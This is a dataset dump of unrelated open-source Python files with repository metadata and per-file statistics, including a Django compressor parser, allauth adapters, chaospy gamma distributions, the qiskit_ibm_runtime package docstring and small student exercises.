3
6fc004c212f2783d2231fc887142507710b49687
42
py
Python
pipguitool/__init__.py
sam-sultan/pipuitool
f8ca67c30d7febdafa1db09de68a955fe3401c29
[ "MIT" ]
null
null
null
pipguitool/__init__.py
sam-sultan/pipuitool
f8ca67c30d7febdafa1db09de68a955fe3401c29
[ "MIT" ]
null
null
null
pipguitool/__init__.py
sam-sultan/pipuitool
f8ca67c30d7febdafa1db09de68a955fe3401c29
[ "MIT" ]
null
null
null
from . import PIP __all__ = [ 'PIP' ]
8.4
17
0.547619
5
42
3.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.309524
42
5
18
8.4
0.655172
0
0
0
0
0
0.069767
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
6fdbb0e14f41da5433b21bdaed33458185527bcc
1,632
py
Python
compressor/parser/lxml.py
cron-ooo/django-compressor
f423ae5ab3c019364bfffb4fc26b3b4a5b5bd32b
[ "Apache-2.0" ]
1,480
2015-01-01T17:48:14.000Z
2022-03-31T14:58:45.000Z
compressor/parser/lxml.py
cron-ooo/django-compressor
f423ae5ab3c019364bfffb4fc26b3b4a5b5bd32b
[ "Apache-2.0" ]
571
2015-01-13T13:03:03.000Z
2022-03-22T09:18:12.000Z
compressor/parser/lxml.py
cron-ooo/django-compressor
f423ae5ab3c019364bfffb4fc26b3b4a5b5bd32b
[ "Apache-2.0" ]
356
2015-01-06T12:00:26.000Z
2022-03-02T17:28:25.000Z
from django.core.exceptions import ImproperlyConfigured from django.utils.encoding import smart_str from django.utils.functional import cached_property from compressor.exceptions import ParserError from compressor.parser import ParserBase class LxmlParser(ParserBase): """ LxmlParser will use `lxml.html` parser to parse rendered contents of {% compress %} tag. """ def __init__(self, content): try: from lxml.html import fromstring from lxml.etree import tostring except ImportError as err: raise ImproperlyConfigured("Error while importing lxml: %s" % err) except Exception as err: raise ParserError("Error while initializing parser: %s" % err) self.fromstring = fromstring self.tostring = tostring super().__init__(content) @cached_property def tree(self): """ Document tree. """ content = '<root>%s</root>' % self.content tree = self.fromstring(content) self.tostring(tree, encoding=str) return tree def css_elems(self): return self.tree.xpath('//link[re:test(@rel, "^stylesheet$", "i")]|style', namespaces={"re": "http://exslt.org/regular-expressions"}) def js_elems(self): return self.tree.findall('script') def elem_attribs(self, elem): return elem.attrib def elem_content(self, elem): return smart_str(elem.text) def elem_name(self, elem): return elem.tag def elem_str(self, elem): return smart_str(self.tostring(elem, method='html', encoding=str))
29.672727
82
0.645221
190
1,632
5.442105
0.415789
0.027079
0.054159
0.03675
0.087041
0
0
0
0
0
0
0
0.250613
1,632
54
83
30.222222
0.845462
0.063113
0
0
0
0
0.118439
0
0
0
0
0
0
1
0.222222
false
0
0.25
0.166667
0.694444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
b51032250cadf3d8672572214b5e9f335bd4da40
190
py
Python
exercicios python/ex015.py
fabiano-filho/python
dafe83d4faf7aba304bdaf4d32ac7a176fa53153
[ "MIT" ]
null
null
null
exercicios python/ex015.py
fabiano-filho/python
dafe83d4faf7aba304bdaf4d32ac7a176fa53153
[ "MIT" ]
null
null
null
exercicios python/ex015.py
fabiano-filho/python
dafe83d4faf7aba304bdaf4d32ac7a176fa53153
[ "MIT" ]
null
null
null
km = float(input('Quantidade de Km rodados: ')) dias = float(input('Quantidade de dias: ')) q = km * 0.15 d = dias * 60 print('Você pagará R${:.2f} pelo aluguel do veículo.'.format(q + d))
27.142857
68
0.642105
32
190
3.8125
0.6875
0.163934
0.327869
0.360656
0
0
0
0
0
0
0
0.038217
0.173684
190
6
69
31.666667
0.738854
0
0
0
0
0
0.481481
0
0
0
0
0
0
1
0
false
0
0
0
0
0.2
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
b510bd7655df21add7130bdb4ce91f9fe1697b5b
241
py
Python
src/M4_default_arguments.py
posguy99/comp660-fall2020
0fbf5b660fe8863bf9754b5227fe47dd03dc2291
[ "MIT" ]
null
null
null
src/M4_default_arguments.py
posguy99/comp660-fall2020
0fbf5b660fe8863bf9754b5227fe47dd03dc2291
[ "MIT" ]
null
null
null
src/M4_default_arguments.py
posguy99/comp660-fall2020
0fbf5b660fe8863bf9754b5227fe47dd03dc2291
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # default arguments, assume a default value if one is not provided def display_info(name, age='42'): print('Name: ', name, 'Age', age) display_info(age='56', name='Marc Wilson') display_info(name='Marc Wilson')
24.1
66
0.701245
38
241
4.368421
0.631579
0.198795
0.180723
0
0
0
0
0
0
0
0
0.024155
0.141079
241
9
67
26.777778
0.777778
0.356846
0
0
0
0
0.228758
0
0
0
0
0
0
1
0.25
false
0
0
0
0.25
0.25
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
d21830d3cea7b8f0d13148101cbe7389164a817f
298
py
Python
models/web_page_css_select.py
koba-masa/my_scraping_tool
f5d4665722835189f6e5fb8b1df449f3a123a833
[ "MIT" ]
null
null
null
models/web_page_css_select.py
koba-masa/my_scraping_tool
f5d4665722835189f6e5fb8b1df449f3a123a833
[ "MIT" ]
2
2021-06-25T10:50:17.000Z
2021-08-07T13:00:26.000Z
models/web_page_css_select.py
koba-masa/my_scraping_tool
f5d4665722835189f6e5fb8b1df449f3a123a833
[ "MIT" ]
null
null
null
class WebPageCssSelect: def __init__(self, url, ua_type, selector_name, value): self.url = url self.ua_type = ua_type self.selector_name = selector_name self.value = value def output(self): return self.url + ',' + self.ua_type + ',' + self.selector_name + ',' + self.value
29.8
86
0.667785
41
298
4.560976
0.317073
0.128342
0.096257
0.139037
0.235294
0
0
0
0
0
0
0
0.204698
298
9
87
33.111111
0.78903
0
0
0
0
0
0.010067
0
0
0
0
0
0
1
0.25
false
0
0
0.125
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
3
d2230b8dc70a64a31f97439b6938638e33413ec4
414
py
Python
system/admin.py
XMLPro/ManegementSystem
037d775101ea701f48ef3ad570af7d9f0c983831
[ "MIT" ]
1
2016-06-07T15:12:43.000Z
2016-06-07T15:12:43.000Z
system/admin.py
XMLPro/ManegementSystem
037d775101ea701f48ef3ad570af7d9f0c983831
[ "MIT" ]
71
2016-02-09T09:49:33.000Z
2016-09-04T17:37:05.000Z
system/admin.py
XMLPro/ManegementSystem
037d775101ea701f48ef3ad570af7d9f0c983831
[ "MIT" ]
null
null
null
from django.contrib import admin from .models import CustomUser, Equipment, Search, TagManagement from .models import Reserved, Request, Vote, Log, Tag admin.site.register(CustomUser) admin.site.register(Equipment) admin.site.register(Search) admin.site.register(Reserved) admin.site.register(Request) admin.site.register(Vote) admin.site.register(Log) admin.site.register(TagManagement) admin.site.register(Tag)
29.571429
64
0.818841
56
414
6.053571
0.303571
0.238938
0.451327
0
0
0
0
0
0
0
0
0
0.070048
414
13
65
31.846154
0.880519
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.25
0
0.25
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
d22b01be86bac13ebfe2589a8209e5b7006474c3
641
py
Python
skeptic/functions/error.py
George3d6/skeptic
84fb8907ae70ed6505d4c6a82b1b42cc51f84cbc
[ "BSD-2-Clause" ]
null
null
null
skeptic/functions/error.py
George3d6/skeptic
84fb8907ae70ed6505d4c6a82b1b42cc51f84cbc
[ "BSD-2-Clause" ]
null
null
null
skeptic/functions/error.py
George3d6/skeptic
84fb8907ae70ed6505d4c6a82b1b42cc51f84cbc
[ "BSD-2-Clause" ]
null
null
null
import numpy as np from sklearn.metrics import balanced_accuracy_score def ma_pct_acc(Y, Yh): ''' Implementation of mean absloute percentage accuracy as the inverse of the error defined here: https://en.wikipedia.org/wiki/Mean_absolute_percentage_error ''' Y = np.array(Y) Yh = np.array(Yh) return 1 - np.mean(np.abs(Y-Yh)/Y) def balanced_acc(Y, Yh): ''' Implementation of accuracy as defined here: https://scikit-learn.org/stable/modules/model_evaluation.html#balanced-accuracy-score @TODO: Custom impl so that sklearn isn't a dependency ''' return balanced_accuracy_score(Y, Yh)
32.05
162
0.708268
96
641
4.614583
0.541667
0.03386
0.142212
0.090293
0.099323
0
0
0
0
0
0
0.001927
0.190328
641
19
163
33.736842
0.851638
0.527301
0
0
0
0
0
0
0
0
0
0.052632
0
1
0.25
false
0
0.25
0
0.75
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
0
0
0
0
1
0
0
3
d23ab6c93ad8d73ad9b339e81a48eae264b42cc6
185
py
Python
snippets/popular_libraries/plum-bum/intro.py
melvio/python3-examples
5340fe17e0a5001a81cf195e63f825b77dc16fca
[ "Apache-2.0" ]
null
null
null
snippets/popular_libraries/plum-bum/intro.py
melvio/python3-examples
5340fe17e0a5001a81cf195e63f825b77dc16fca
[ "Apache-2.0" ]
null
null
null
snippets/popular_libraries/plum-bum/intro.py
melvio/python3-examples
5340fe17e0a5001a81cf195e63f825b77dc16fca
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 from plumbum.cmd import echo pseudo_json = {'hi': 'there'} cmd = echo[pseudo_json] # /usr/bin/echo {'hi': 'there'} print(cmd) print(cmd()) # {'hi': 'there'}
18.5
56
0.627027
28
185
4.071429
0.5
0.184211
0.245614
0
0
0
0
0
0
0
0
0.006329
0.145946
185
9
57
20.555556
0.71519
0.362162
0
0
0
0
0.06087
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0.4
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
d254b8cb518c3ea7f65e2e35fd93f7d6e4521bd7
1,216
py
Python
exercises/0322-CoinChange/coin_change_test.py
tqa236/leetcode-solutions
556147981c43509a6e8a7f59f138d1ab027ebfd1
[ "MIT" ]
1
2020-09-26T15:09:25.000Z
2020-09-26T15:09:25.000Z
exercises/0322-CoinChange/coin_change_test.py
tqa236/leetcode-solutions
556147981c43509a6e8a7f59f138d1ab027ebfd1
[ "MIT" ]
null
null
null
exercises/0322-CoinChange/coin_change_test.py
tqa236/leetcode-solutions
556147981c43509a6e8a7f59f138d1ab027ebfd1
[ "MIT" ]
null
null
null
import unittest import hypothesis.strategies as st from hypothesis import given from coin_change import Solution class Test(unittest.TestCase): def test_1(self): solution = Solution() self.assertEqual(solution.coinChange([1, 2, 5], 11), 3) def test_2(self): solution = Solution() self.assertEqual(solution.coinChange([2], 3), -1) def test_3(self): solution = Solution() self.assertEqual(solution.coinChange([1], 0), 0) def test_4(self): solution = Solution() self.assertEqual(solution.coinChange([1], 1), 1) def test_5(self): solution = Solution() self.assertEqual(solution.coinChange([1], 2), 2) def test_6(self): solution = Solution() self.assertEqual(solution.coinChange([1, 2, 4, 8, 10], 10002), 1001) # def test_7(self): # solution = Solution() # self.assertEqual(solution.coinChange([186, 419, 83, 408], 6249), 20) # @given(st.lists(st.integers(), min_size=1), st.lists(st.integers())) # def test_random(self, x, y): # solution = Solution() # self.assertEqual(solution.coinChange(), True) if __name__ == "__main__": unittest.main()
28.27907
78
0.623355
150
1,216
4.933333
0.32
0.075676
0.216216
0.335135
0.578378
0.578378
0.512162
0.368919
0.222973
0
0
0.062165
0.23273
1,216
43
79
28.27907
0.730975
0.238487
0
0.24
0
0
0.008705
0
0
0
0
0
0.24
1
0.24
false
0
0.16
0
0.44
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
d26316516fb12bfdb184b219ee197585d646ba8c
1,237
py
Python
locuszoom_plotting_service/users/adapters.py
statgen/locuszoom-hosted
ecfcc5f48fefe2869ab277202a661c2575af6abb
[ "MIT" ]
null
null
null
locuszoom_plotting_service/users/adapters.py
statgen/locuszoom-hosted
ecfcc5f48fefe2869ab277202a661c2575af6abb
[ "MIT" ]
14
2021-01-01T17:16:23.000Z
2022-02-28T19:37:28.000Z
locuszoom_plotting_service/users/adapters.py
statgen/locuszoom-hosted
ecfcc5f48fefe2869ab277202a661c2575af6abb
[ "MIT" ]
null
null
null
from typing import Any from allauth.account.adapter import DefaultAccountAdapter from allauth.socialaccount.adapter import DefaultSocialAccountAdapter from django.conf import settings from django.core.exceptions import ValidationError from django.http import HttpRequest class AccountAdapter(DefaultAccountAdapter): """Disable locally-managed accounts; only OAuth allowed. (even for development)""" def is_open_for_signup(self, request: HttpRequest): return False class SocialAccountAdapter(DefaultSocialAccountAdapter): """Note: a google quirk doesn't allow IPs in oauth url (even eg 0.0.0.0); use localhost instead""" def is_open_for_signup(self, request: HttpRequest, sociallogin: Any): return getattr(settings, "ACCOUNT_ALLOW_REGISTRATION", True) def validate_disconnect(self, account, accounts): """ Social accounts are the only login scheme allowed for this app; removing all from this user would therefore leave their account broken (with no way to log in) """ if len(accounts) == 1: raise ValidationError('You must have at least one account connected') super(SocialAccountAdapter, self).validate_disconnect(account, accounts)
41.233333
115
0.750202
150
1,237
6.12
0.613333
0.03268
0.019608
0.026144
0.087146
0.087146
0.087146
0.087146
0
0
0
0.004926
0.179466
1,237
29
116
42.655172
0.899507
0.265158
0
0
0
0
0.080738
0.029988
0
0
0
0
0
1
0.1875
false
0
0.375
0.125
0.8125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
1
1
0
0
3
d273970ede0f3facde5d9e95372f491327255f07
475
py
Python
_note_/_shutil_.py
By2048/_python_
be57738093676a1273e6f69232723669e408986e
[ "MIT" ]
2
2017-02-16T14:50:33.000Z
2018-02-03T01:49:06.000Z
_note_/_shutil_.py
By2048/_python_
be57738093676a1273e6f69232723669e408986e
[ "MIT" ]
null
null
null
_note_/_shutil_.py
By2048/_python_
be57738093676a1273e6f69232723669e408986e
[ "MIT" ]
null
null
null
import shutil shutil.get_archive_formats() shutil.make_archive('/tmp/f1', 'zip', root_dir='/tmp/f1/') shutil.move('/tmp/f1', '/tmp/f2') shutil.copytree('/tmp/f1/', '/tmp/f2/') shutil.copytree('/tmp/f1/', '/tmp/f2/', ignore=shutil.ignore_patterns('*.pyc', 'tmp*')) shutil.rmtree('/tmp/f1/') shutil.copy('/tmp/f1', '/tmp/f2') shutil.copyfile('/tmp/f1', '/tmp/f2') shutil.copymode('/tmp/f1', '/tmp/f2') shutil.copystat('/tmp/f1', '/tmp/f2') shutil.copy2('/tmp/f1', '/tmp/f2')
31.666667
87
0.646316
74
475
4.081081
0.310811
0.182119
0.211921
0.264901
0.403974
0.192053
0.192053
0.192053
0.192053
0.192053
0
0.044643
0.056842
475
14
88
33.928571
0.629464
0
0
0
0
0
0.317895
0
0
0
0
0
0
1
0
true
0
0.083333
0
0.083333
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
96286ded532822bc79aa8f182ed0a84cf13dad46
3,343
py
Python
chaospy/distributions/collection/gamma.py
utsekaj42/chaospy
0fb23cbb58eb987c3ca912e2a20b83ebab0514d0
[ "MIT" ]
333
2016-10-25T12:00:48.000Z
2022-03-30T07:50:33.000Z
chaospy/distributions/collection/gamma.py
utsekaj42/chaospy
0fb23cbb58eb987c3ca912e2a20b83ebab0514d0
[ "MIT" ]
327
2016-09-25T16:29:41.000Z
2022-03-30T03:26:27.000Z
chaospy/distributions/collection/gamma.py
utsekaj42/chaospy
0fb23cbb58eb987c3ca912e2a20b83ebab0514d0
[ "MIT" ]
74
2016-10-17T11:14:13.000Z
2021-12-09T10:55:59.000Z
"""Gamma distribution.""" import numpy from scipy import special from ..baseclass import SimpleDistribution, ShiftScaleDistribution class gamma(SimpleDistribution): def __init__(self, a=1): super(gamma, self).__init__(dict(a=a)) def _pdf(self, x, a): return x**(a-1)*numpy.e**(-x)/special.gamma(a) def _cdf(self, x, a): return special.gammainc(a, x) def _ppf(self, q, a): return special.gammaincinv(a, q) def _mom(self, k, a): return special.gamma(a+k)/special.gamma(a) def _ttr(self, n, a): return 2.*n+a, n*n+n*(a-1) def _lower(self, a): return 0. def _upper(self, a): return special.gammaincinv(a, 1-1e-14) class Gamma(ShiftScaleDistribution): """ Gamma distribution. Also an Erlang distribution when shape=k and scale=1./lamb. Args: shape (float, Distribution): Shape parameter. a>0. scale (float, Distribution): Scale parameter. scale!=0 shift (float, Distribution): Location of the lower bound. Examples: >>> distribution = chaospy.Gamma(3, scale=0.5) >>> distribution Gamma(3, scale=0.5) >>> uloc = numpy.linspace(0, 1, 6) >>> uloc array([0. , 0.2, 0.4, 0.6, 0.8, 1. ]) >>> xloc = distribution.inv(uloc) >>> xloc.round(3) array([ 0. , 0.768, 1.143, 1.553, 2.14 , 19.459]) >>> numpy.allclose(distribution.fwd(xloc), uloc) True >>> distribution.pdf(xloc).round(3) array([0. , 0.508, 0.531, 0.432, 0.254, 0. ]) >>> distribution.sample(4).round(3) array([1.683, 0.587, 3.152, 1.301]) >>> distribution.mom(1).round(3) 1.5 >>> distribution.ttr([0, 1, 2, 3]).round(3) array([[1.5 , 2.5 , 3.5 , 4.5 ], [0. , 0.75, 2. , 3.75]]) """ def __init__(self, shape=1, scale=1, shift=0): super(Gamma, self).__init__( dist=gamma(shape), scale=scale, shift=shift, repr_args=[shape], ) class Exponential(ShiftScaleDistribution): R""" Exponential Probability Distribution Args: scale (float, Distribution): Scale parameter. scale!=0 shift (float, Distribution): Location of the lower bound. Examples;: >>> distribution = chaospy.Exponential() >>> distribution Exponential() >>> uloc = numpy.linspace(0, 1, 6) >>> uloc array([0. , 0.2, 0.4, 0.6, 0.8, 1. ]) >>> xloc = distribution.inv(uloc) >>> xloc.round(3) array([ 0. , 0.223, 0.511, 0.916, 1.609, 32.237]) >>> numpy.allclose(distribution.fwd(xloc), uloc) True >>> distribution.pdf(xloc).round(3) array([1. , 0.8, 0.6, 0.4, 0.2, 0. ]) >>> distribution.sample(4).round(3) array([1.06 , 0.122, 3.001, 0.658]) >>> distribution.mom(1).round(3) 1.0 >>> distribution.ttr([1, 2, 3]).round(3) array([[3., 5., 7.], [1., 4., 9.]]) """ def __init__(self, scale=1, shift=0): super(Exponential, self).__init__( dist=gamma(1), scale=scale, shift=shift, repr_args=[], )
27.178862
66
0.518696
431
3,343
3.946636
0.234339
0.035273
0.051734
0.035273
0.4903
0.424456
0.346855
0.346855
0.30923
0.30923
0
0.08726
0.314388
3,343
122
67
27.401639
0.654887
0.564762
0
0.108108
0
0
0
0
0
0
0
0
0
1
0.27027
false
0
0.081081
0.189189
0.621622
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
962f76c92089823307d591039b72f7cd22f55f08
1,189
py
Python
webtool/server/admin.py
wodo/WebTool3
1582a03d619434d8a6139f705a1b5860e9b5b8b8
[ "BSD-2-Clause" ]
13
2018-12-16T21:01:24.000Z
2019-07-03T06:23:41.000Z
webtool/server/admin.py
dav-kempten/WebTool3
859f39df67cb0f853c7fe33cb5d08b999d8692fc
[ "BSD-2-Clause" ]
26
2019-07-07T06:44:06.000Z
2021-09-07T07:28:34.000Z
webtool/server/admin.py
dav-kempten/WebTool3
859f39df67cb0f853c7fe33cb5d08b999d8692fc
[ "BSD-2-Clause" ]
3
2017-06-18T06:22:52.000Z
2019-07-03T06:21:05.000Z
from django.contrib import admin from django.contrib.auth.admin import User from server.models.collective import Collective, Session from server.models.qualification import Qualification, QualificationGroup from server.models.instruction import Instruction, Topic from server.models.category import Category, CategoryGroup from server.models.tour import Tour from server.models.equipment import Equipment from server.models.calendar import Calendar, Anniversary, Vacation from server.user_admin import UserAdmin from server.event_admin import InstructionAdmin, TourAdmin # Register your models here. # Auth.User admin.site.unregister(User) admin.site.register(User, UserAdmin) # Calendar admin.site.register(Calendar) admin.site.register(Anniversary) admin.site.register(Vacation) # Collective admin.site.register(Collective) admin.site.register(Session) # Qualifications admin.site.register(Qualification) admin.site.register(QualificationGroup) # Mixins admin.site.register(Category) admin.site.register(CategoryGroup) admin.site.register(Tour, TourAdmin) admin.site.register(Equipment) # Instructions admin.site.register(Instruction, InstructionAdmin) admin.site.register(Topic)
29
73
0.83852
147
1,189
6.768707
0.231293
0.135678
0.239196
0.050251
0
0
0
0
0
0
0
0
0.078217
1,189
40
74
29.725
0.907847
0.076535
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.423077
0
0.423077
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
3
964492a4d0eaf338ab8240263eedee2a98a048db
9,387
py
Python
qiskit_ibm_runtime/__init__.py
rathishcholarajan/qiskit-ibm-runtime
315a088a844dc8aa4452bde6136b53694dfb3220
[ "Apache-2.0" ]
null
null
null
qiskit_ibm_runtime/__init__.py
rathishcholarajan/qiskit-ibm-runtime
315a088a844dc8aa4452bde6136b53694dfb3220
[ "Apache-2.0" ]
null
null
null
qiskit_ibm_runtime/__init__.py
rathishcholarajan/qiskit-ibm-runtime
315a088a844dc8aa4452bde6136b53694dfb3220
[ "Apache-2.0" ]
null
null
null
# This code is part of Qiskit. # # (C) Copyright IBM 2022. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ ========================================== Qiskit Runtime (:mod:`qiskit_ibm_runtime`) ========================================== .. currentmodule:: qiskit_ibm_runtime Modules related to Qiskit Runtime IBM Client. Qiskit Runtime is a new architecture that streamlines computations requiring many iterations. These experiments will execute significantly faster within its improved hybrid quantum/classical process. Qiskit Runtime IBM Client allows authorized users to upload their Qiskit quantum programs. A Qiskit quantum program, also called a runtime program, is a piece of Python code and its metadata that takes certain inputs, performs quantum and maybe classical processing, and returns the results. The same or other authorized users can invoke these quantum programs by simply passing in parameters. Account initialization ---------------------- You need to initialize your account before you can start using the Qiskit Runtime service. This is done by initializing an :class:`QiskitRuntimeService` instance with your account credentials. If you don't want to pass in the credentials each time, you can use the :meth:`QiskitRuntimeService.save_account` method to save the credentials on disk. Qiskit Runtime is available on both IBM Cloud and IBM Quantum, and you can specify ``channel="ibm_cloud"`` for IBM Cloud and ``channel="ibm_quantum"`` for IBM Quantum. The default is IBM Cloud. Listing runtime programs ------------------------ To list all available runtime programs:: from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() # List all available programs. service.pprint_programs() # Get a single program. program = service.program('sampler') # Print program metadata. print(program) The example above prints the program metadata of all available runtime programs and of just the ``sampler`` program. A program metadata consists of the program's ID, name, description, input parameters, return values, interim results, and other information that helps you to know more about the program. Invoking a runtime program -------------------------- You can use the :meth:`QiskitRuntimeService.run` method to invoke a runtime program. For example:: from qiskit import QuantumCircuit from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() backend = "ibmq_qasm_simulator" # Create a circuit. qc = QuantumCircuit(2, 2) qc.h(0) qc.cx(0, 1) qc.measure_all() # Set the "sampler" program parameters params = service.program(program_id="sampler").parameters() params.circuits = qc # Configure backend options options = {'backend_name': backend} # Execute the circuit using the "sampler" program. job = service.run(program_id="sampler", options=options, inputs=params) # Get runtime job result. result = job.result() The example above invokes the ``sampler`` program. Runtime Jobs ------------ When you use the :meth:`QiskitRuntimeService.run` method to invoke a runtime program, a :class:`RuntimeJob` instance is returned. This class has all the basic job methods, such as :meth:`RuntimeJob.status`, :meth:`RuntimeJob.result`, and :meth:`RuntimeJob.cancel`. Interim and final results ------------------------- Some runtime programs provide interim results that inform you about program progress. You can choose to stream the interim results and final result when you run the program by passing in the ``callback`` parameter, or at a later time using the :meth:`RuntimeJob.stream_results` method. For example:: from qiskit import QuantumCircuit from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() backend = "ibmq_qasm_simulator" def result_callback(job_id, result): print(result) # Stream results as soon as the job starts running. job = service.run(program_id="sampler", options=options, inputs=program_inputs, callback=result_callback) Backend data ------------ :class:`QiskitRuntimeService` also has methods, such as :meth:`backend`, :meth:`backends`, and :meth:`least_busy`, that allows you to query for a target backend to use. These methods return one or more :class:`IBMBackend` instances that contains methods and attributes describing the backend. Uploading a program ------------------- Each runtime program has both ``data`` and ``metadata``. Program data is the Python code to be executed. Program metadata provides usage information, such as program description, its inputs and outputs, and backend requirements. A detailed program metadata helps the consumers of the program to know what is needed to run the program. Each program data needs to have a ``main(backend, user_messenger, **kwargs)`` method, which serves as the entry point to the program. The ``backend`` parameter is a :class:`ProgramBackend` instance whose :meth:`ProgramBackend.run` method can be used to submit circuits. The ``user_messenger`` is a :class:`UserMessenger` instance whose :meth:`UserMessenger.publish` method can be used to publish interim and final results. See `qiskit_ibm_runtime/program/program_template.py` for a program data template file. Each program metadata must include at least the program name, description, and maximum execution time. You can find description of each metadata field in the :meth:`QiskitRuntimeService.upload_program` method. Instead of passing in the metadata fields individually, you can pass in a JSON file or a dictionary to :meth:`QiskitRuntimeService.upload_program` via the ``metadata`` parameter. `qiskit_ibm_runtime/program/program_metadata_sample.json` is a sample file of program metadata. You can use the :meth:`QiskitRuntimeService.upload_program` to upload a program. For example:: from qiskit_ibm_runtime import QiskitRuntimeService service = QiskitRuntimeService() program_id = service.upload_program( data="my_vqe.py", metadata="my_vqe_metadata.json" ) In the example above, the file ``my_vqe.py`` contains the program data, and ``my_vqe_metadata.json`` contains the program metadata. Method :meth:`QiskitRuntimeService.delete_program` allows you to delete a program. Files related to writing a runtime program are in the ``qiskit_ibm_runtime/program`` directory. Logging ------- `qiskit-ibm-runtime` uses the ``qiskit_ibm_runtime`` logger. Two environment variables can be used to control the logging: * ``QISKIT_IBM_RUNTIME_LOG_LEVEL``: Specifies the log level to use. If an invalid level is set, the log level defaults to ``WARNING``. The valid log levels are ``DEBUG``, ``INFO``, ``WARNING``, ``ERROR``, and ``CRITICAL`` (case-insensitive). If the environment variable is not set, then the parent logger's level is used, which also defaults to ``WARNING``. * ``QISKIT_IBM_RUNTIME_LOG_FILE``: Specifies the name of the log file to use. If specified, messages will be logged to the file only. Otherwise messages will be logged to the standard error (usually the screen). For more advanced use, you can modify the logger itself. For example, to manually set the level to ``WARNING``:: import logging logging.getLogger('qiskit_ibm_runtime').setLevel(logging.WARNING) Classes ========================== .. autosummary:: :toctree: ../stubs/ QiskitRuntimeService Estimator Sampler IBMBackend RuntimeJob RuntimeProgram ParameterNamespace RuntimeOptions RuntimeEncoder RuntimeDecoder IBMRuntimeService """ import logging from .qiskit_runtime_service import QiskitRuntimeService, IBMRuntimeService from .ibm_backend import IBMBackend from .runtime_job import RuntimeJob from .runtime_program import RuntimeProgram, ParameterNamespace from .runtime_options import RuntimeOptions from .utils.json import RuntimeEncoder, RuntimeDecoder from .exceptions import * from .utils.utils import setup_logger from .version import __version__ from .estimator import Estimator from .sampler import Sampler # TODO remove when terra code is released from .qiskit.primitives import ( BaseEstimator, EstimatorResult, BaseSampler, SamplerResult, ) # Setup the logger for the IBM Quantum Provider package. logger = logging.getLogger(__name__) setup_logger(logger) # Constants used by the IBM Quantum logger. QISKIT_IBM_RUNTIME_LOGGER_NAME = "qiskit_ibm_runtime" """The name of the IBM Quantum logger.""" QISKIT_IBM_RUNTIME_LOG_LEVEL = "QISKIT_IBM_RUNTIME_LOG_LEVEL" """The environment variable name that is used to set the level for the IBM Quantum logger.""" QISKIT_IBM_RUNTIME_LOG_FILE = "QISKIT_IBM_RUNTIME_LOG_FILE" """The environment variable name that is used to set the file for the IBM Quantum logger."""
35.157303
97
0.738468
1,255
9,387
5.440637
0.274104
0.026362
0.046866
0.016696
0.184681
0.141916
0.123169
0.118043
0.08553
0.071178
0
0.001669
0.170235
9,387
266
98
35.289474
0.874952
0.882497
0
0
0
0
0.08528
0.064252
0
0
0
0.003759
0
1
0
false
0
0.565217
0
0.565217
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
964f8b0ef168e01380c77ffdd8150df7996bd18b
425
py
Python
grammar.py
prtx/SLR-Parser-Implementation
d73bb54763219fdc1becf0e4179e1a49517d7242
[ "MIT" ]
null
null
null
grammar.py
prtx/SLR-Parser-Implementation
d73bb54763219fdc1becf0e4179e1a49517d7242
[ "MIT" ]
null
null
null
grammar.py
prtx/SLR-Parser-Implementation
d73bb54763219fdc1becf0e4179e1a49517d7242
[ "MIT" ]
1
2020-06-25T04:03:14.000Z
2020-06-25T04:03:14.000Z
